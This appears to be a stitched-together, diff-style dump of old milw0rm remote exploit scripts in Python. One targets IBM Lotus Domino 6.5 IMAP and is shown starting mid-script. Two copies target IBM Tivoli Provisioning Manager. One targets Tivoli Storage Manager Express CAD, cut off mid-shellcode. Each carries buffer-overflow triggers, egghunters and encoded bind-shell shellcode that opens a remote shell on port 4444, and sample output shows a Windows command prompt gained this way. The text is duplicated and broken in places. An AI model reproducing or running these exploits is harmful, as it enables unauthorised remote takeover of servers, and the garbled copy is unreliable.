"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, 143))
response = sock.recv(1024)
bind = 'a001 admin ' + bindshell +'\r\n'
print "[*] Sending bindshell *somewhere* into memory"
sock.send(bind)
response = sock.recv(1024)
sock.close()
def ExploitLotus(target):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, 143))
response = sock.recv(1024)
print response
auth = 'a001 authenticate cram-md5\r\n'
sock.send(auth)
response = sock.recv(1024)
print response
m = md5.new()
m.update(response[2:0])
digest = m.digest()
payload = "\x90" * 12 + "\x33\xd2\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + 'A' * 210
# 0x774b4c6a CALL [EAX +4]
payload += "jLKw"
payload += "\x90\x90\x90\x83\xE8\x52\x83\xE8\x52\x83\xE8\x52\xFF\xE0"
login = payload + ' ' + digest
login = base64.encodestring(login) + '\r\n'
print "[*] Triggering overwrite, ph33r."
sock.send(login)
sock.close()
print "[*] You may need to wait up to 2 minutes"
print "[*] for egghunter to find da shell."
if __name__=="__main__":
try:
target = sys.argv[1]
except IndexError:
print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n'
print '[*] Usage: %s <imap server>\n' % sys.argv[0]
sys.exit(-1)
print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n'
sendbind(target)
sendbind(target)
sendbind(target)
sendbind(target)
ExploitLotus(target)
# milw0rm.com [2007-03-31]


@ -1,107 +1,107 @@
#!/usr/bin/python
#
# IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit
# http://dvlabs.tippingpoint.com/advisory/TPTI-07-05
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# muts@offensive-security.com
# http://www.offensive-security.com/0day/ibm-ti-pro.py
# Notes:
# * Egghunter can take upto 5 minutes to find the shell.
#
# bt ~ # ./ibm-ti-pro.py 192.168.9.32
# [*] IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit.
# [*] http://dvlabs.tippingpoint.com/advisory/TPTI-07-05
# [*] muts@offensive-security.com
#
# [*] Sending evil payload to 192.168.9.32:8080
# [*] Payload sent, egghunter can take upto 5 minutes to find the shell
# [*] Happy Hunting!
#
# bt ~ # nc -nv 192.168.9.32 4444
# WIN2K3STD.LOCAL [192.168.9.32] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket
import os
import sys
def banner():
print "\n[*] IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit."
print "[*] http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"
print "[*] muts@offensive-security.com"
if len(sys.argv)!=2:
banner()
print "[*] Usage: ibm-ti-pro.py <ip>\n"
sys.exit(0)
#77E0211B FFD4 CALL ESP Win2k SP0
banner()
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8080 ) )
# Payload #1
sc = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
# Payload #2
# win32_bind - LPORT=4444 Encoder=PexAlphaNum http://metasploit.com
bindshell =("\x54\x30\x30\x57\x54\x30\x30\x57"
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")
print "[*] Sending evil payload to "+sys.argv[1] +":8080"
expl.send ( 'GET /' + '\x41'*131 +bindshell+'\x1b\x21\xe0\x77'+'\x90'*8 +sc +'\xcc'*500+'.exe HTTP/1.0\r\n\r\n\r\n')
print "[*] Payload sent, egghunter can take upto 5 minutes to find the shell"
print "[*] Happy Hunting!"
expl.close()
# milw0rm.com [2007-06-03]
#!/usr/bin/python
#
# IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit
# http://dvlabs.tippingpoint.com/advisory/TPTI-07-05
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# muts@offensive-security.com
# http://www.offensive-security.com/0day/ibm-ti-pro.py
# Notes:
# * Egghunter can take upto 5 minutes to find the shell.
#
# bt ~ # ./ibm-ti-pro.py 192.168.9.32
# [*] IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit.
# [*] http://dvlabs.tippingpoint.com/advisory/TPTI-07-05
# [*] muts@offensive-security.com
#
# [*] Sending evil payload to 192.168.9.32:8080
# [*] Payload sent, egghunter can take upto 5 minutes to find the shell
# [*] Happy Hunting!
#
# bt ~ # nc -nv 192.168.9.32 4444
# WIN2K3STD.LOCAL [192.168.9.32] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket
import os
import sys
def banner():
print "\n[*] IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit."
print "[*] http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"
print "[*] muts@offensive-security.com"
if len(sys.argv)!=2:
banner()
print "[*] Usage: ibm-ti-pro.py <ip>\n"
sys.exit(0)
#77E0211B FFD4 CALL ESP Win2k SP0
banner()
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8080 ) )
# Payload #1
sc = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
# Payload #2
# win32_bind - LPORT=4444 Encoder=PexAlphaNum http://metasploit.com
bindshell =("\x54\x30\x30\x57\x54\x30\x30\x57"
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")
print "[*] Sending evil payload to "+sys.argv[1] +":8080"
expl.send ( 'GET /' + '\x41'*131 +bindshell+'\x1b\x21\xe0\x77'+'\x90'*8 +sc +'\xcc'*500+'.exe HTTP/1.0\r\n\r\n\r\n')
print "[*] Payload sent, egghunter can take upto 5 minutes to find the shell"
print "[*] Happy Hunting!"
expl.close()
# milw0rm.com [2007-06-03]


@ -1,100 +1,100 @@
#!/usr/bin/python
#
# IBM Tivoli Storage Manager Express CAD Service Buffer Overflow (5.3)
# http://www.zerodayinitiative.com/advisories/ZDI-07-054.html
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# muts.at.offensive-security.com
# http://www.offensive-security.com/0day/dsmcad.py.txt
#
# bt ~ # ./dsmcad.py 192.168.1.107
# [*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
# [*] http://www.offensive-security.com
# [*] Connecting to 192.168.1.107
# [*] Sending evil buffer, ph33r
# [*] Check port 4444 for bindshell
#
# bt ~ # nc -v 192.168.1.107 4444
# 192.168.1.107: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.107] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# E:\Program Files\Tivoli\TSM\baclient>
import socket
import sys
print "[*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow"
print "[*] http://www.offensive-security.com"
def usage():
print "[*] Usage: ./dsmcad.py <host>"
sys.exit(1)
if len(sys.argv) != 2:
usage()
buffer="BirdsflyinghighyouknowhowIfeel"
buffer+="SunintheskyyouknowhowIfeel"
buffer+="ReeedsdriftinonbyyouknowhowIfeel"
buffer+="ItsanewdawnItsanewdayItsanewlifeForme"
buffer+="ItsanewdawnItsanewdayItsanewlifeFormeitsanewdawnitsanewdayforme"
buffer+="\x38\x07\xD2\x77" #77D20738 - FFE4 JMP ESP User32.dll Win2kSp0 EN
buffer+="\x90"*4
buffer+=(
# win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x37\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x71\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x68\x69\x49\x6c\x31"
"\x7a\x68\x6b\x62\x6d\x49\x78\x4b\x49\x39\x6f\x6b\x4f\x39\x6f\x33"
"\x50\x4e\x6b\x52\x4c\x34\x64\x74\x64\x6e\x6b\x42\x65\x67\x4c\x6c"
"\x4b\x41\x6c\x46\x65\x42\x58\x57\x71\x7a\x4f\x6c\x4b\x50\x4f\x65"
"\x48\x4e\x6b\x71\x4f\x51\x30\x37\x71\x58\x6b\x77\x39\x4e\x6b\x75"
"\x64\x4c\x4b\x53\x31\x5a\x4e\x44\x71\x4b\x70\x6f\x69\x6e\x4c\x6c"
"\x44\x69\x50\x42\x54\x45\x57\x4f\x31\x7a\x6a\x36\x6d\x54\x41\x6b"
"\x72\x78\x6b\x69\x64\x47\x4b\x50\x54\x36\x44\x64\x68\x43\x45\x4a"
"\x45\x6e\x6b\x41\x4f\x56\x44\x65\x51\x48\x6b\x75\x36\x6c\x4b\x64"
"\x4c\x50\x4b\x6e\x6b\x71\x4f\x77\x6c\x34\x41\x48\x6b\x53\x33\x66"
"\x4c\x6e\x6b\x4b\x39\x30\x6c\x36\x44\x65\x4c\x51\x71\x4f\x33\x57"
"\x41\x39\x4b\x71\x74\x4c\x4b\x50\x43\x76\x50\x4e\x6b\x41\x50\x54"
"\x4c\x6e\x6b\x32\x50\x45\x4c\x4c\x6d\x6e\x6b\x47\x30\x36\x68\x73"
"\x6e\x32\x48\x6c\x4e\x30\x4e\x56\x6e\x5a\x4c\x56\x30\x6b\x4f\x4b"
"\x66\x71\x76\x62\x73\x31\x76\x45\x38\x74\x73\x76\x52\x71\x78\x63"
"\x47\x63\x43\x76\x52\x31\x4f\x41\x44\x79\x6f\x4e\x30\x65\x38\x58"
"\x4b\x48\x6d\x4b\x4c\x75\x6b\x72\x70\x6b\x4f\x7a\x76\x71\x4f\x6f"
"\x79\x6d\x35\x51\x76\x6c\x41\x58\x6d\x65\x58\x57\x72\x73\x65\x73"
"\x5a\x44\x42\x49\x6f\x6e\x30\x31\x78\x4e\x39\x64\x49\x6a\x55\x4e"
"\x4d\x53\x67\x79\x6f\x6e\x36\x41\x43\x31\x43\x46\x33\x73\x63\x42"
"\x73\x30\x43\x41\x43\x32\x63\x70\x53\x4b\x4f\x38\x50\x43\x56\x71"
"\x78\x74\x51\x33\x6c\x31\x76\x70\x53\x4e\x69\x5a\x41\x4d\x45\x41"
"\x78\x4c\x64\x35\x4a\x30\x70\x6b\x77\x52\x77\x6b\x4f\x6e\x36\x62"
"\x4a\x34\x50\x72\x71\x76\x35\x69\x6f\x4e\x30\x45\x38\x6e\x44\x4c"
"\x6d\x46\x4e\x4d\x39\x46\x37\x59\x6f\x4b\x66\x30\x53\x62\x75\x49"
"\x6f\x38\x50\x63\x58\x6b\x55\x37\x39\x4e\x66\x71\x59\x41\x47\x6b"
"\x4f\x5a\x76\x70\x50\x51\x44\x31\x44\x70\x55\x6b\x4f\x68\x50\x6e"
"\x73\x71\x78\x59\x77\x70\x79\x5a\x66\x71\x69\x66\x37\x6b\x4f\x6a"
"\x76\x52\x75\x4b\x4f\x5a\x70\x71\x76\x31\x7a\x55\x34\x31\x76\x72"
"\x48\x50\x63\x72\x4d\x6f\x79\x78\x65\x53\x5a\x72\x70\x72\x79\x76"
"\x49\x78\x4c\x4b\x39\x4d\x37\x53\x5a\x32\x64\x6d\x59\x6a\x42\x37"
"\x41\x6b\x70\x4b\x43\x4f\x5a\x49\x6e\x63\x72\x56\x4d\x49\x6e\x30"
"\x42\x64\x6c\x6d\x43\x6c\x4d\x62\x5a\x75\x68\x6c\x6b\x6e\x4b\x6e"
"\x4b\x50\x68\x43\x42\x49\x6e\x6c\x73\x62\x36\x69\x6f\x74\x35\x30"
"\x44\x6b\x4f\x48\x56\x53\x6b\x70\x57\x73\x62\x71\x41\x70\x51\x76"
"\x31\x63\x5a\x57\x71\x42\x71\x66\x31\x72\x75\x71\x41\x49\x6f\x68"
"\x50\x75\x38\x4c\x6d\x79\x49\x74\x45\x5a\x6e\x32\x73\x4b\x4f\x6e"
"\x36\x72\x4a\x6b\x4f\x6b\x4f\x50\x37\x79\x6f\x4e\x30\x6e\x6b\x46"
"\x37\x69\x6c\x4f\x73\x69\x54\x52\x44\x49\x6f\x4b\x66\x43\x62\x6b"
"\x4f\x5a\x70\x51\x78\x7a\x50\x4f\x7a\x76\x64\x31\x4f\x33\x63\x4b"
"\x4f\x48\x56\x49\x6f\x48\x50\x61")
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
print "[*] Connecting to "+sys.argv[1]
expl.connect ( ( sys.argv[1], 1581 ) )
print "[*] Sending evil buffer, ph33r"
expl.send ( 'GET /BACLIENT HTTP/1.0\r\nHost: 192.168.1.1 '+ buffer+'\r\n\r\n')
expl.close()
print "[*] Check port 4444 for bindshell"
# milw0rm.com [2007-10-27]
#!/usr/bin/python
#
# IBM Tivoli Storage Manager Express CAD Service Buffer Overflow (5.3)
# http://www.zerodayinitiative.com/advisories/ZDI-07-054.html
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# muts.at.offensive-security.com
# http://www.offensive-security.com/0day/dsmcad.py.txt
#
# bt ~ # ./dsmcad.py 192.168.1.107
# [*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
# [*] http://www.offensive-security.com
# [*] Connecting to 192.168.1.107
# [*] Sending evil buffer, ph33r
# [*] Check port 4444 for bindshell
#
# bt ~ # nc -v 192.168.1.107 4444
# 192.168.1.107: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.107] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# E:\Program Files\Tivoli\TSM\baclient>
import socket
import sys
print "[*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow"
print "[*] http://www.offensive-security.com"
def usage():
print "[*] Usage: ./dsmcad.py <host>"
sys.exit(1)
if len(sys.argv) != 2:
usage()
buffer="BirdsflyinghighyouknowhowIfeel"
buffer+="SunintheskyyouknowhowIfeel"
buffer+="ReeedsdriftinonbyyouknowhowIfeel"
buffer+="ItsanewdawnItsanewdayItsanewlifeForme"
buffer+="ItsanewdawnItsanewdayItsanewlifeFormeitsanewdawnitsanewdayforme"
buffer+="\x38\x07\xD2\x77" #77D20738 - FFE4 JMP ESP User32.dll Win2kSp0 EN
buffer+="\x90"*4
buffer+=(
# win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x37\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x71\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x68\x69\x49\x6c\x31"
"\x7a\x68\x6b\x62\x6d\x49\x78\x4b\x49\x39\x6f\x6b\x4f\x39\x6f\x33"
"\x50\x4e\x6b\x52\x4c\x34\x64\x74\x64\x6e\x6b\x42\x65\x67\x4c\x6c"
"\x4b\x41\x6c\x46\x65\x42\x58\x57\x71\x7a\x4f\x6c\x4b\x50\x4f\x65"
"\x48\x4e\x6b\x71\x4f\x51\x30\x37\x71\x58\x6b\x77\x39\x4e\x6b\x75"
"\x64\x4c\x4b\x53\x31\x5a\x4e\x44\x71\x4b\x70\x6f\x69\x6e\x4c\x6c"
"\x44\x69\x50\x42\x54\x45\x57\x4f\x31\x7a\x6a\x36\x6d\x54\x41\x6b"
"\x72\x78\x6b\x69\x64\x47\x4b\x50\x54\x36\x44\x64\x68\x43\x45\x4a"
"\x45\x6e\x6b\x41\x4f\x56\x44\x65\x51\x48\x6b\x75\x36\x6c\x4b\x64"
"\x4c\x50\x4b\x6e\x6b\x71\x4f\x77\x6c\x34\x41\x48\x6b\x53\x33\x66"
"\x4c\x6e\x6b\x4b\x39\x30\x6c\x36\x44\x65\x4c\x51\x71\x4f\x33\x57"
"\x41\x39\x4b\x71\x74\x4c\x4b\x50\x43\x76\x50\x4e\x6b\x41\x50\x54"
"\x4c\x6e\x6b\x32\x50\x45\x4c\x4c\x6d\x6e\x6b\x47\x30\x36\x68\x73"
"\x6e\x32\x48\x6c\x4e\x30\x4e\x56\x6e\x5a\x4c\x56\x30\x6b\x4f\x4b"
"\x66\x71\x76\x62\x73\x31\x76\x45\x38\x74\x73\x76\x52\x71\x78\x63"
"\x47\x63\x43\x76\x52\x31\x4f\x41\x44\x79\x6f\x4e\x30\x65\x38\x58"
"\x4b\x48\x6d\x4b\x4c\x75\x6b\x72\x70\x6b\x4f\x7a\x76\x71\x4f\x6f"
"\x79\x6d\x35\x51\x76\x6c\x41\x58\x6d\x65\x58\x57\x72\x73\x65\x73"
"\x5a\x44\x42\x49\x6f\x6e\x30\x31\x78\x4e\x39\x64\x49\x6a\x55\x4e"
"\x4d\x53\x67\x79\x6f\x6e\x36\x41\x43\x31\x43\x46\x33\x73\x63\x42"
"\x73\x30\x43\x41\x43\x32\x63\x70\x53\x4b\x4f\x38\x50\x43\x56\x71"
"\x78\x74\x51\x33\x6c\x31\x76\x70\x53\x4e\x69\x5a\x41\x4d\x45\x41"
"\x78\x4c\x64\x35\x4a\x30\x70\x6b\x77\x52\x77\x6b\x4f\x6e\x36\x62"
"\x4a\x34\x50\x72\x71\x76\x35\x69\x6f\x4e\x30\x45\x38\x6e\x44\x4c"
"\x6d\x46\x4e\x4d\x39\x46\x37\x59\x6f\x4b\x66\x30\x53\x62\x75\x49"
"\x6f\x38\x50\x63\x58\x6b\x55\x37\x39\x4e\x66\x71\x59\x41\x47\x6b"
"\x4f\x5a\x76\x70\x50\x51\x44\x31\x44\x70\x55\x6b\x4f\x68\x50\x6e"
"\x73\x71\x78\x59\x77\x70\x79\x5a\x66\x71\x69\x66\x37\x6b\x4f\x6a"
